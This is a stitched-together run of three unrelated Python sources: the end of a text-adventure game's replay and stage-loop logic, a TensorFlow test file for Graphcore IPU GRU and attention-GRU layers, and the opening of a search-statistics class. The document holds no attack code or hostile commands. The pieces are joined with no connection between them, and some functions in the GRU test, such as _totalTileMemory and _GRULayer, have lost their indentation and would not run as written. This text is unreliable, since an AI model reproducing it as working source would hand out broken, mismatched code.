    def restart(self):
        """Offer a replay; any answer containing 'y' restarts the game."""
        i = input("Would you like to play again?\nYes/no> ")
        if 'y' in i.lower():
            self.start()
        else:
            print("Thank you for playing.")

    def cont(self, stage, second_attempt = False):
        # starts the next scene
        s = self.stages[stage]
        if second_attempt:
            output = s.enter(self.health, second_attempt)
        else:
            output = s.enter(self.health)
        # Stages return either 3- or 4-tuples; the optional 4th element
        # flags a "second attempt" re-entry (Tower only). Checking the
        # length replaces the original bare try/except around unpacking,
        # and resetting the flag for 3-tuples stops a stale True value
        # being forwarded to stages whose enter() takes no such argument.
        if len(output) == 4:
            nx, health, end, second_attempt = output
        else:
            nx, health, end = output
            second_attempt = False
        if end:
            self.restart()
        else:
            self.health = health
            self.cont(nx, second_attempt)

    def start(self):
        """Set health from the difficulty and enter the starting stage."""
        if self.difficulty == 'easy':
            self.health = 30
        elif self.difficulty == 'hard':
            self.health = 15
        elif self.difficulty == 'expert':
            self.health = 5
        else:
            self.health = 20
        s = self.starting_stage()
        nx, health, end = s.enter(self.health)
        if end:
            self.restart()
        else:
            self.health = health
            self.cont(nx)
# Launch a run starting at the castle wall with default ('medium') difficulty.
p = Play(Castle_wall)
p.start()
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the GRU cell and layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import numpy as np
from absl.testing import parameterized
import pva
# pylint: disable=unused-import
from tensorflow.compiler.tests import xla_test
from tensorflow.compiler.plugin.poplar.ops import gen_popnn_ops
from tensorflow.python.platform import googletest
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ipu.config import IPUConfig
from tensorflow.python.ipu import utils
from tensorflow.python.ipu import test_utils as tu
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import gradient_descent
from tensorflow.keras.layers import GRU
# pylint: enable=unused-import
# Common test dimensions: a single-batch, 3-step sequence of 5 input
# features mapped to 8 output channels, all in float32.
DATA_TYPE = np.float32
BATCH_SIZE = 1
SEQ_LEN = 3
INPUT_SIZE = 5
NUM_CHANNELS = 8
def _totalTileMemory(report):
return sum(tile.memory.total.excludingGaps
for tile in report.compilation.tiles)
class AUGRUCell(rnn_cell.RNNCell):
  """GRU cell whose update gate is scaled by a per-step attention score.

  The attention score rides along as the LAST feature of `inputs` (see
  _GRULayerCPU, which concatenates it), because dynamic_rnn passes only a
  single input tensor to the cell.
  """

  def __init__(self, num_units, kernel_init, recurrent_init, bias_init):
    super().__init__()
    self._num_units = num_units
    self.kernel_init = kernel_init
    self.recurrent_init = recurrent_init
    self.bias_init = bias_init

  @property
  def state_size(self):
    return self._num_units

  @property
  def output_size(self):
    return self._num_units

  def __call__(self, inputs, state, scope=None):
    # Unpack inputs and attention scores
    x = inputs[:, :-1]
    a = inputs[:, -1]
    # Get weights
    n = self._num_units
    h = state
    input_dim = x.shape[1]
    # AUTO_REUSE lets the same variables be shared across time steps.
    with variable_scope.variable_scope("",
                                       use_resource=True,
                                       reuse=variable_scope.AUTO_REUSE):
      kernel = _get_variable('kernel', [input_dim, n * 3], self.kernel_init)
      rec_kernel = _get_variable('recurrent_kernel', [n, n * 3],
                                 self.recurrent_init)
      bias = _get_variable('bias', [n * 3], self.bias_init)
    # Reset gate
    rx = math_ops.matmul(x, kernel[:, :n])
    rh = math_ops.matmul(h, rec_kernel[:, :n])
    r = math_ops.sigmoid(rx + rh + bias[:n])
    # Update gate
    zx = math_ops.matmul(x, kernel[:, n:n * 2])
    zh = math_ops.matmul(h, rec_kernel[:, n:n * 2])
    z = math_ops.sigmoid(zx + zh + bias[n:n * 2])
    # Candidate state
    cx = math_ops.matmul(x, kernel[:, n * 2:])
    ch = math_ops.matmul(r * h, rec_kernel[:, n * 2:])
    c = math_ops.tanh(cx + ch + bias[n * 2:])
    # Attention score influences the mixing of the old + candidate states.
    # This is the only difference between the GRU and AUGRU cells.
    z = z * (1 - a)
    # Mix old state and candidate state
    h = z * h + (1 - z) * c
    return h, h
def _get_variable(name, shape, initializer):
  """Create (or reuse) a variable of the test-wide DATA_TYPE."""
  return variable_scope.get_variable(
      name, shape=shape, dtype=DATA_TYPE, initializer=initializer)
def _createGRUInput(value, shape):
  """Constant DATA_TYPE input array of `shape` filled with `value`."""
  arr = np.empty(shape, dtype=DATA_TYPE)
  arr.fill(value)
  return arr
def _createGRUInitialState(value, shape):
  """Constant DATA_TYPE state array of `shape` filled with `value`."""
  return np.full(shape=shape, fill_value=value, dtype=DATA_TYPE)
class GRUTest(xla_test.XLATestCase, parameterized.TestCase): # pylint: disable=abstract-method
  def _GRULayerCPU(
      self,
      inputs,
      weights_value,
      seq_length,
      seq_val,
      initial_state,
      att_scores,
      training,
      name,
      input_size=INPUT_SIZE,  # pylint: disable=unused-argument
      num_channels=NUM_CHANNELS,
      activation='tanh',
      recurrent_activation='sigmoid'):
    """CPU reference for the IPU layer built by _GRULayer.

    With no attention scores this is a Keras GRU; with attention scores it
    runs dynamic_rnn over the hand-written AUGRUCell.  Output is truncated
    to min(SEQ_LEN, seq_val[0]) steps when `seq_val` is given.
    """
    del name  # only meaningful for the popnn (IPU) ops
    with ops.device("/device:CPU:0"):
      kernel_init = init_ops.constant_initializer(weights_value, DATA_TYPE)
      recurrent_init = init_ops.constant_initializer(weights_value, DATA_TYPE)
      bias_init = init_ops.constant_initializer(0.0, DATA_TYPE)
      if att_scores is None:
        gru = GRU(num_channels,
                  activation=activation,
                  recurrent_activation=recurrent_activation,
                  kernel_initializer=kernel_init,
                  recurrent_initializer=recurrent_init,
                  bias_initializer=bias_init,
                  time_major=True,
                  return_sequences=True,
                  stateful=True,
                  reset_after=False)
        outputs = gru(inputs, initial_state=initial_state, training=training)
      else:
        # There is no native AUGRU implementation
        # The attention score is appended as an extra input feature; the
        # cell splits it back out (see AUGRUCell.__call__).
        inputs = array_ops.concat(
            [inputs, array_ops.expand_dims(att_scores, -1)], axis=2)
        outputs, _ = rnn.dynamic_rnn(AUGRUCell(num_channels, kernel_init,
                                               recurrent_init, bias_init),
                                     inputs=inputs,
                                     sequence_length=seq_length,
                                     initial_state=initial_state,
                                     dtype=DATA_TYPE,
                                     scope="augru",
                                     time_major=True)
    outputs = outputs if seq_val is None else outputs[0:min(
        SEQ_LEN, seq_val[0])]
    return outputs
def _GRULayer(self,
inputs,
weights_value,
seq_length,
seq_val,
initial_state,
att_scores,
training,
name,
activation='tanh',
recurrent_activation='sigmoid',
input_size=INPUT_SIZE,
num_channels=NUM_CHANNELS,
options=None,
options_bwd=None):
with ops.device("/device:IPU:0"):
with variable_scope.variable_scope("gru_layer", use_resource=True):
kernel = _get_variable(
"kernel",
shape=[input_size + num_channels, 3 * num_channels],
initializer=init_ops.constant_initializer(weights_value,
DATA_TYPE))
biases = _get_variable("biases",
shape=[3, num_channels],
initializer=init_ops.constant_initializer(
0.0, DATA_TYPE))
options = {} if options is None else options
options_bwd = {} if options is None else options_bwd
if seq_length is None:
outputs, _ = gen_popnn_ops.popnn_gru_layer(
activation=activation,
recurrent_activation=recurrent_activation,
inputs=inputs,
num_channels=num_channels,
kernel=kernel,
biases=biases,
initial_state=initial_state,
is_training=training,
name=name,
options=json.dumps(options),
options_bwd=json.dumps(options_bwd))
elif att_scores is not None:
outputs, _ = gen_popnn_ops.popnn_augru_layer(
activation=activation,
recurrent_activation=recurrent_activation,
inputs=inputs,
num_channels=num_channels,
kernel=kernel,
biases=biases,
initial_state=initial_state,
is_training=training,
seq_len=seq_length,
att_score=att_scores,
name=name,
options=json.dumps(options),
options_bwd=json.dumps(options_bwd))
else:
outputs, _ = gen_popnn_ops.popnn_dynamic_gru_layer(
activation=activation,
recurrent_activation=recurrent_activation,
inputs=inputs,
num_channels=num_channels,
kernel=kernel,
biases=biases,
initial_state=initial_state,
is_training=training,
seq_len=seq_length,
name=name,
options=json.dumps(options),
options_bwd=json.dumps(options_bwd))
outputs = outputs if seq_val is None else outputs[0:min(
SEQ_LEN, seq_val[0])]
return outputs
  def _RunGRULayerInference(self, name, input_value, weights_value, seq_val,
                            init_state_value, att_score_val,
                            gru_layer_function):
    """Build and run one inference pass of `gru_layer_function`.

    Feeds constant-filled inputs/initial state (plus optional seq_len and
    attention-score placeholders) and returns the output sequence array.
    """
    with self.session() as sess:
      pinputs = array_ops.placeholder(DATA_TYPE,
                                      [SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
                                      name="inputs")
      pinitial_state = array_ops.placeholder(DATA_TYPE,
                                             [BATCH_SIZE, NUM_CHANNELS],
                                             name="initial_state")
      # Optional placeholders: only created when a value is supplied,
      # since the layer functions branch on None.
      pseq_len = array_ops.placeholder(
          np.int32, [BATCH_SIZE],
          name="seq_len") if seq_val is not None else None
      patt_scores = array_ops.placeholder(
          DATA_TYPE, [SEQ_LEN, BATCH_SIZE],
          name="att_score") if att_score_val is not None else None
      gru_output_seq = gru_layer_function(inputs=pinputs,
                                          weights_value=weights_value,
                                          seq_length=pseq_len,
                                          att_scores=patt_scores,
                                          seq_val=seq_val,
                                          initial_state=pinitial_state,
                                          training=False,
                                          name=name)
      inputs = _createGRUInput(input_value, pinputs.shape)
      initial_state = _createGRUInitialState(init_state_value,
                                             pinitial_state.shape)
      fd = {pinputs: inputs, pinitial_state: initial_state}
      if pseq_len is not None:
        fd[pseq_len] = seq_val
      if patt_scores is not None:
        fd[patt_scores] = np.full(patt_scores.shape, att_score_val, DATA_TYPE)
      sess.run(variables.global_variables_initializer())
      return sess.run(gru_output_seq, fd)
  def _RunInferenceComparison(self,
                              name,
                              input_value,
                              weights_value,
                              init_state_value,
                              seq_val=None,
                              att_score_val=None):
    """Run the popnn (IPU) and CPU reference layers; outputs must match."""
    ops.reset_default_graph()
    popnn_out = self._RunGRULayerInference(name=name,
                                           input_value=input_value,
                                           weights_value=weights_value,
                                           seq_val=seq_val,
                                           att_score_val=att_score_val,
                                           init_state_value=init_state_value,
                                           gru_layer_function=self._GRULayer)
    ref_out = self._RunGRULayerInference(name=name,
                                         input_value=input_value,
                                         weights_value=weights_value,
                                         seq_val=seq_val,
                                         att_score_val=att_score_val,
                                         init_state_value=init_state_value,
                                         gru_layer_function=self._GRULayerCPU)
    # Check that the whole output sequence matches
    self.assertAllClose(popnn_out, ref_out)
  def testGRULayerInference(self):
    """popnn GRU/AUGRU inference matches the CPU reference across configs."""
    cfg = IPUConfig()
    cfg.ipu_model.compile_ipu_code = False
    cfg.configure_ipu_system()
    np.random.seed(0)
    # Run with attention scores (augru):
    for init_state_value in [0., 1.]:
      self._RunInferenceComparison('augru',
                                   input_value=0.01,
                                   weights_value=0.1,
                                   init_state_value=init_state_value,
                                   seq_val=[1],
                                   att_score_val=0.5)
    # Run with all-0 weights
    for init_state_value in [0., 1.]:
      self._RunInferenceComparison('ones',
                                   input_value=0.,
                                   weights_value=0.,
                                   init_state_value=init_state_value)
    # Run with all-1 weights
    for init_state_value in [0., 1.]:
      self._RunInferenceComparison('ones',
                                   input_value=0.,
                                   weights_value=1.,
                                   init_state_value=init_state_value)
    # Run with random weights
    for weight in np.random.rand(3):
      for init_state_value in [0., 1.]:
        self._RunInferenceComparison('rand',
                                     input_value=0.,
                                     weights_value=weight,
                                     init_state_value=init_state_value)
    # Run with seq_len of 1 (requires batch size 1 for a single value)
    assert BATCH_SIZE == 1
    for init_state_value in [0., 1.]:
      self._RunInferenceComparison('ones',
                                   input_value=0.,
                                   weights_value=0.,
                                   init_state_value=init_state_value,
                                   seq_val=[1])
    # Run with zero seq_len
    for init_state_value in [0., 1.]:
      self._RunInferenceComparison('ones',
                                   input_value=0.,
                                   weights_value=0.,
                                   init_state_value=init_state_value,
                                   seq_val=[0])
  def _RunGRULayerTraining(self,
                           name,
                           input_value,
                           weights_value,
                           seq_val,
                           init_state_value,
                           training_steps,
                           labels_array,
                           att_score_val,
                           gru_layer_function,
                           device_string,
                           batch_size=BATCH_SIZE,
                           input_size=INPUT_SIZE,
                           num_channels=NUM_CHANNELS,
                           options=None,
                           options_bwd=None):
    """Train `gru_layer_function` for `training_steps` SGD steps.

    Builds a mean-logits + sparse-softmax loss over the layer output on
    `device_string` and returns the list of per-step loss values.
    """
    with self.session() as sess:
      pinputs = array_ops.placeholder(DATA_TYPE,
                                      [SEQ_LEN, batch_size, input_size],
                                      name="inputs")
      plabels = array_ops.placeholder(np.int32, [batch_size], name="labels")
      pseq_len = array_ops.placeholder(
          np.int32, [batch_size],
          name="seq_len") if seq_val is not None else None
      patt_scores = array_ops.placeholder(
          DATA_TYPE, [SEQ_LEN, batch_size],
          name="att_score") if att_score_val is not None else None
      with ops.device(device_string):
        with variable_scope.variable_scope("gru_layer", use_resource=True):
          # Unlike inference, the initial state is a trainable variable.
          initial_state = _get_variable(
              "initial_state",
              shape=[batch_size, num_channels],
              initializer=init_ops.constant_initializer(
                  init_state_value, DATA_TYPE))
        # Only forward the option dicts that were actually supplied
        # (the CPU reference layer does not accept them).
        kwargs = {}
        if options is not None:
          kwargs["options"] = options
        if options_bwd is not None:
          kwargs["options_bwd"] = options_bwd
        logits = gru_layer_function(inputs=pinputs,
                                    weights_value=weights_value,
                                    seq_length=pseq_len,
                                    seq_val=seq_val,
                                    initial_state=initial_state,
                                    att_scores=patt_scores,
                                    training=True,
                                    name=name,
                                    input_size=input_size,
                                    num_channels=num_channels,
                                    **kwargs)
        logits = math_ops.reduce_mean(logits, axis=0)
        softmax = nn.sparse_softmax_cross_entropy_with_logits_v2(
            logits=logits, labels=array_ops.stop_gradient(plabels))
        loss = math_ops.reduce_mean(softmax)
        train = gradient_descent.GradientDescentOptimizer(0.01).minimize(loss)
      utils.move_variable_initialization_to_cpu()
      sess.run(variables.global_variables_initializer())
      losses = []
      inputs = _createGRUInput(input_value, pinputs.shape)
      fd = {
          pinputs: inputs,
          plabels: labels_array,
      }
      if seq_val is not None:
        fd[pseq_len] = seq_val
      if patt_scores is not None:
        fd[patt_scores] = np.full(patt_scores.shape, att_score_val, DATA_TYPE)
      for _ in range(0, training_steps):
        l, _ = sess.run([loss, train], fd)
        losses.append(l)
      return losses
  def _RunTrainingComparison(self,
                             name,
                             input_value,
                             weights_value,
                             init_state_value,
                             training_steps,
                             seq_val=None,
                             att_score_val=None):
    """Train on IPU and CPU with identical settings; losses must match."""
    labels_array = np.ones(shape=[BATCH_SIZE], dtype=np.int32)
    ops.reset_default_graph()
    popnn_losses = self._RunGRULayerTraining(name=name,
                                             input_value=input_value,
                                             weights_value=weights_value,
                                             seq_val=seq_val,
                                             init_state_value=init_state_value,
                                             att_score_val=att_score_val,
                                             training_steps=training_steps,
                                             labels_array=labels_array,
                                             gru_layer_function=self._GRULayer,
                                             device_string="/device:IPU:0")
    # Fresh graph so the reference run does not reuse the IPU variables.
    ops.reset_default_graph()
    ref_losses = self._RunGRULayerTraining(
        name=name,
        input_value=input_value,
        weights_value=weights_value,
        seq_val=seq_val,
        init_state_value=init_state_value,
        att_score_val=att_score_val,
        training_steps=training_steps,
        labels_array=labels_array,
        gru_layer_function=self._GRULayerCPU,
        device_string="/device:CPU:0")
    self.assertAllClose(popnn_losses, ref_losses)
  def testGRULayerTraining(self):
    """popnn GRU/AUGRU training losses match the CPU reference."""
    cfg = IPUConfig()
    cfg.ipu_model.compile_ipu_code = False
    cfg.configure_ipu_system()
    np.random.seed(42)
    # Run with random weights
    for weight in np.random.rand(3):
      for init_state_value in [0., 1.]:
        self._RunTrainingComparison('rand',
                                    input_value=0.,
                                    weights_value=weight,
                                    init_state_value=init_state_value,
                                    training_steps=3)
    # Run with a sequence length (requires batch size 1 for one value)
    assert BATCH_SIZE == 1
    for weight in np.random.rand(3):
      for init_state_value in [0., 1.]:
        self._RunTrainingComparison('rand',
                                    input_value=0.,
                                    weights_value=weight,
                                    init_state_value=init_state_value,
                                    training_steps=3,
                                    seq_val=[1])
    # Run with attention scores
    for weight in np.random.rand(3):
      for init_state_value in [0., 1.]:
        self._RunTrainingComparison('augru',
                                    input_value=0.,
                                    weights_value=weight,
                                    init_state_value=init_state_value,
                                    training_steps=3,
                                    seq_val=[1],
                                    att_score_val=0.5)
  def testGRUActivations(self):
    """IPU and CPU GRUs agree for every supported activation combination."""
    input_value = 0.7
    weights_value = 0.3
    init_state_value = 1.
    seq_val = None
    inputs = _createGRUInput(input_value, [SEQ_LEN, BATCH_SIZE, INPUT_SIZE])
    initial_state = _createGRUInitialState(init_state_value,
                                           [BATCH_SIZE, NUM_CHANNELS])
    def run(gru_layer_function, act, rec_act):
      # Build and run one inference pass with the given activation pair.
      ops.reset_default_graph()
      with self.session() as sess:
        pinputs = array_ops.placeholder(DATA_TYPE,
                                        [SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
                                        name="inputs")
        pinitial_state = array_ops.placeholder(DATA_TYPE,
                                               [BATCH_SIZE, NUM_CHANNELS],
                                               name="initial_state")
        pseq_len = array_ops.placeholder(
            np.int32, [BATCH_SIZE],
            name="seq_len") if seq_val is not None else None
        gru_output_seq = gru_layer_function(inputs=pinputs,
                                            weights_value=weights_value,
                                            seq_length=pseq_len,
                                            seq_val=seq_val,
                                            att_scores=None,
                                            initial_state=pinitial_state,
                                            training=False,
                                            name=None,
                                            activation=act,
                                            recurrent_activation=rec_act)
        fd = {pinputs: inputs, pinitial_state: initial_state}
        if pseq_len is not None:
          fd[pseq_len] = seq_val
        sess.run(variables.global_variables_initializer())
        return sess.run(gru_output_seq, fd)
    for activation in ['tanh', 'relu', 'softmax', 'sigmoid', 'hard_sigmoid']:
      for recurrent_activation in ['softmax', 'sigmoid', 'hard_sigmoid']:
        output_cpu = run(self._GRULayerCPU, activation, recurrent_activation)
        output_ipu = run(self._GRULayer, activation, recurrent_activation)
        self.assertAllClose(output_cpu, output_ipu)
  def testGRUCached(self):
    """Two identically-shaped GRUs share one compiled graph function.

    Verified via the compilation report: two forward GRU compute sets but
    only one backward one.
    """
    cfg = IPUConfig()
    report_helper = tu.ReportHelper()
    report_helper.set_autoreport_options(cfg)
    cfg.ipu_model.compile_ipu_code = False
    cfg.configure_ipu_system()
    with self.session() as sess:
      pinputs1 = array_ops.placeholder(DATA_TYPE,
                                       [SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
                                       name="inputs1")
      pinputs2 = array_ops.placeholder(DATA_TYPE,
                                       [SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
                                       name="inputs2")
      plabels = array_ops.placeholder(np.int32, [BATCH_SIZE], name="labels")
      with ops.device("/device:IPU:0"):
        def gru_layer(inputs, name):
          # Each call creates its own trainable initial state within the
          # caller's variable scope.
          initial_state = _get_variable(
              "initial_state",
              shape=[BATCH_SIZE, NUM_CHANNELS],
              initializer=init_ops.constant_initializer(0.1, DATA_TYPE))
          return self._GRULayer(inputs=inputs,
                                weights_value=1.,
                                seq_length=None,
                                seq_val=None,
                                att_scores=None,
                                initial_state=initial_state,
                                training=True,
                                name=name)
        with variable_scope.variable_scope("gru_layer1", use_resource=True):
          logits1 = gru_layer(pinputs1, "layer1")
        with variable_scope.variable_scope("gru_layer2", use_resource=True):
          logits2 = gru_layer(pinputs2, "layer2")
        logits = (math_ops.reduce_mean(logits1, axis=0) +
                  math_ops.reduce_mean(logits2, axis=0))
        softmax = nn.sparse_softmax_cross_entropy_with_logits_v2(
            logits=logits, labels=array_ops.stop_gradient(plabels))
        loss = math_ops.reduce_mean(softmax)
        train = gradient_descent.GradientDescentOptimizer(0.01).minimize(loss)
      sess.run(variables.global_variables_initializer())
      report_helper.clear_reports()
      sess.run(
          [loss, train], {
              pinputs1: _createGRUInput(0.5, pinputs1.shape),
              pinputs2: _createGRUInput(1.5, pinputs2.shape),
              plabels: np.ones(shape=[BATCH_SIZE], dtype=np.int32),
          })
      report = pva.openReport(report_helper.find_report())
      self.assert_compute_sets_matches(
          report, '*BasicGruCell/ProcessUnits/Weight/Conv*/Convolve', 2,
          "There should be two fwd GRUs")
      self.assert_compute_sets_matches(report, '*/MulOGate/Op/Multiply', 1,
                                       "There should be one bwd GRU")
  def testGRUNotCached(self):
    """Two GRU layers with different sequence lengths cannot share a
    compiled GRU: expect twice the compute sets of testGRUCached."""
    cfg = IPUConfig()
    report_helper = tu.ReportHelper()
    report_helper.set_autoreport_options(cfg)
    cfg.ipu_model.compile_ipu_code = False
    cfg.configure_ipu_system()

    with self.session() as sess:
      # Note here the second GRU is larger.
      pinputs1 = array_ops.placeholder(DATA_TYPE,
                                       [SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
                                       name="inputs1")
      pinputs2 = array_ops.placeholder(DATA_TYPE,
                                       [SEQ_LEN * 2, BATCH_SIZE, INPUT_SIZE],
                                       name="inputs2")
      plabels = array_ops.placeholder(np.int32, [BATCH_SIZE], name="labels")

      with ops.device("/device:IPU:0"):

        def gru_layer(inputs, name):
          # Per-layer initial-state variable; layer sizes differ via the
          # inputs' sequence length, defeating graph caching.
          initial_state = _get_variable(
              "initial_state",
              shape=[BATCH_SIZE, NUM_CHANNELS],
              initializer=init_ops.constant_initializer(0.1, DATA_TYPE))
          return self._GRULayer(inputs=inputs,
                                weights_value=1.,
                                seq_length=None,
                                seq_val=None,
                                att_scores=None,
                                initial_state=initial_state,
                                training=True,
                                name=name)

        with variable_scope.variable_scope("gru_layer1", use_resource=True):
          logits1 = gru_layer(pinputs1, "layer1")
        with variable_scope.variable_scope("gru_layer2", use_resource=True):
          logits2 = gru_layer(pinputs2, "layer2")

        logits = (math_ops.reduce_mean(logits1, axis=0) +
                  math_ops.reduce_mean(logits2, axis=0))
        softmax = nn.sparse_softmax_cross_entropy_with_logits_v2(
            logits=logits, labels=array_ops.stop_gradient(plabels))
        loss = math_ops.reduce_mean(softmax)
        train = gradient_descent.GradientDescentOptimizer(0.01).minimize(loss)

      sess.run(variables.global_variables_initializer())
      report_helper.clear_reports()

      sess.run(
          [loss, train], {
              pinputs1: _createGRUInput(0.5, pinputs1.shape),
              pinputs2: _createGRUInput(1.5, pinputs2.shape),
              plabels: np.ones(shape=[BATCH_SIZE], dtype=np.int32),
          })

      # Twice the compute sets of testGRUCached: each layer compiled
      # separately.
      report = pva.openReport(report_helper.find_report())
      self.assert_compute_sets_matches(
          report, '*BasicGruCell/ProcessUnits/Weight/Conv*/Convolve', 4,
          "There should be four fwd GRUs")
      self.assert_compute_sets_matches(report, '*/MulOGate/Op/Multiply', 2,
                                       "There should be two bwd GRUs")
  @parameterized.parameters((True,), (False,))
  def testGRUWithAvailableMemoryProportionFwd(self, valid_value):
    """A valid forward-pass availableMemoryProportion (0.7) must be
    accepted; a negative one must raise InternalError at run time."""
    cfg = IPUConfig()
    report_helper = tu.ReportHelper()
    report_helper.set_autoreport_options(cfg)
    cfg.ipu_model.compile_ipu_code = False
    cfg.configure_ipu_system()

    with self.session() as sess:
      pinputs = array_ops.placeholder(DATA_TYPE,
                                      [SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
                                      name="inputs")
      pinitial_state = array_ops.placeholder(DATA_TYPE,
                                             [BATCH_SIZE, NUM_CHANNELS],
                                             name="initial_state")
      gru_output_seq = self._GRULayer(
          inputs=pinputs,
          weights_value=1.,
          seq_length=None,
          seq_val=None,
          att_scores=None,
          initial_state=pinitial_state,
          training=False,
          name=None,
          # Deliberately invalid (negative) in the False parameterization.
          options={"availableMemoryProportion": 0.7 if valid_value else -123.})

      sess.run(variables.global_variables_initializer())

      def run_gru():
        sess.run(
            gru_output_seq, {
                pinputs: _createGRUInput(0.7, pinputs.shape),
                pinitial_state: _createGRUInitialState(1.,
                                                       pinitial_state.shape)
            })

      if valid_value:
        run_gru()
      else:
        self.assertRaisesRegex(errors.InternalError,
                               "Value must be greater than or equal to 0",
                               run_gru)
  def testGRUGreaterAvailableMemoryProportionFwdMeansGreaterTotalTileMemory(
      self):
    """A higher availableMemoryProportion should yield a larger total
    tile memory in the execution profile (0.8 run vs 0.1 run)."""
    cfg = IPUConfig()
    report_helper = tu.ReportHelper()
    report_helper.set_autoreport_options(cfg, output_execution_profile=True)
    cfg.ipu_model.compile_ipu_code = True
    cfg.ipu_model.tiles_per_ipu = 32
    cfg.configure_ipu_system()

    name = "availableMemoryProportion"
    # Larger dimensions than the module defaults, presumably so the
    # option measurably affects planning — TODO confirm.
    batch_size = 256
    input_size = 256
    num_channels = 256

    def run_gru(amp_val):
      # One inference run under a unique variable scope per amp value so
      # the two runs do not collide on variable names.
      with self.session() as sess:
        with variable_scope.variable_scope("gru_" +
                                           str(amp_val).replace(".", "_"),
                                           use_resource=True):
          pinputs = array_ops.placeholder(DATA_TYPE,
                                          [SEQ_LEN, batch_size, input_size],
                                          name="inputs")
          pinitial_state = array_ops.placeholder(DATA_TYPE,
                                                 [batch_size, num_channels],
                                                 name="initial_state")
          gru_output_seq = self._GRULayer(
              inputs=pinputs,
              weights_value=1.,
              seq_length=None,
              seq_val=None,
              att_scores=None,
              initial_state=pinitial_state,
              training=False,
              name=name,
              input_size=input_size,
              num_channels=num_channels,
              options={"availableMemoryProportion": amp_val})
          utils.move_variable_initialization_to_cpu()
          sess.run(variables.global_variables_initializer())
          sess.run(
              gru_output_seq, {
                  pinputs: _createGRUInput(0.7, pinputs.shape),
                  pinitial_state: _createGRUInitialState(1.,
                                                         pinitial_state.shape)
              })

    run_gru(0.8)
    run_gru(0.1)

    # One report per run; the 0.8 run must use more total tile memory.
    report_paths = report_helper.find_reports()
    self.assertEqual(len(report_paths), 2)
    reports = [pva.openReport(report) for report in report_paths]
    self.assertGreater(_totalTileMemory(reports[0]),
                       _totalTileMemory(reports[1]))
  def _run_single_gru_training_step(self,
                                    name,
                                    batch_size=BATCH_SIZE,
                                    input_size=INPUT_SIZE,
                                    num_channels=NUM_CHANNELS,
                                    amp_val=None):
    """Run one IPU GRU training step, threading amp_val through to the
    backward-pass options (used by the Bwd availableMemoryProportion
    tests)."""
    self._RunGRULayerTraining(
        name=name,
        input_value=0.,
        weights_value=0.7,
        init_state_value=1.,
        training_steps=1,
        seq_val=None,
        att_score_val=0.5,
        labels_array=np.ones(shape=[batch_size], dtype=np.int32),
        gru_layer_function=self._GRULayer,
        device_string="/device:IPU:0",
        batch_size=batch_size,
        input_size=input_size,
        num_channels=num_channels,
        options_bwd={"availableMemoryProportion": amp_val})
  @parameterized.parameters((True), (False))
  def testGRUWithAvailableMemoryProportionBwd(self, valid_value):
    """A valid backward-pass availableMemoryProportion (0.7) must be
    accepted; a negative one must raise InternalError."""
    cfg = IPUConfig()
    report_helper = tu.ReportHelper()
    report_helper.set_autoreport_options(cfg)
    cfg.ipu_model.compile_ipu_code = False
    cfg.configure_ipu_system()

    name = ("" if valid_value else "in") + "validAvailableMemoryProportionBwd"

    if valid_value:
      self._run_single_gru_training_step(name, amp_val=0.7)
    else:
      with self.assertRaisesRegex(errors.InternalError,
                                  "Value must be greater than or equal to 0"):
        self._run_single_gru_training_step(name, amp_val=-123.)
  def testGRUGreaterAvailableMemoryProportionBwdMeansGreaterTotalTileMemory(
      self):
    """A higher backward-pass availableMemoryProportion should yield a
    larger total tile memory (training step at 0.8 vs 0.1)."""
    cfg = IPUConfig()
    report_helper = tu.ReportHelper()
    report_helper.set_autoreport_options(cfg, output_execution_profile=True)
    cfg.ipu_model.compile_ipu_code = True
    cfg.ipu_model.tiles_per_ipu = 32
    cfg.configure_ipu_system()

    name = "availableMemoryProportion"
    # Larger dimensions than the module defaults so the option measurably
    # affects planning — mirrors the Fwd variant above.
    batch_size = 256
    input_size = 256
    num_channels = 256

    self._run_single_gru_training_step(name,
                                       batch_size=batch_size,
                                       input_size=input_size,
                                       num_channels=num_channels,
                                       amp_val=0.8)
    self._run_single_gru_training_step(name,
                                       batch_size=batch_size,
                                       input_size=input_size,
                                       num_channels=num_channels,
                                       amp_val=0.1)

    # One report per training run; the 0.8 run must use more memory.
    report_paths = report_helper.find_reports()
    self.assertEqual(len(report_paths), 2)
    reports = [pva.openReport(report) for report in report_paths]
    self.assertGreater(_totalTileMemory(reports[0]),
                       _totalTileMemory(reports[1]))
if __name__ == "__main__":
  # Lower XLA's auto-clustering threshold so even tiny graphs compile
  # through XLA (presumably required for the IPU test path — TODO
  # confirm), while preserving any flags already in the environment.
  os.environ['TF_XLA_FLAGS'] = ('--tf_xla_min_cluster_size=1 ' +
                                os.environ.get('TF_XLA_FLAGS', ''))
  googletest.main()
|
__author__ = "Nick Anderson"
### Stats
# This class tracks various stats for Searcher objects to print out in below format.
class Stats:
    """Tracks summary statistics for a Searcher object (frontier sizes,
    search depth, branching factor, final cost/path) and pretty-prints
    them.

    Fix: printStats previously raised ZeroDivisionError / IndexError when
    no node had been expanded; it now prints a short notice instead.
    """

    # Takes in a search type, map file, hfn, and total nodes from Searcher object
    def __init__(self, newSearchType, infile, newHfn, newTotalNodes):
        # Identification of the search being summarised.
        self.searchType = newSearchType
        self.mapFile = infile
        self.hfn = newHfn  # heuristic function name (shown only for A*)
        self.totalNodes = newTotalNodes
        # Results, filled in via the setters/updaters below.
        self.startNode = ''
        self.goalNode = []
        self.endCost = 0
        self.endPath = []
        self.frontierTotal = 0
        self.frontierMax = 0
        self.depthTotal = 0
        self.depthMax = 0
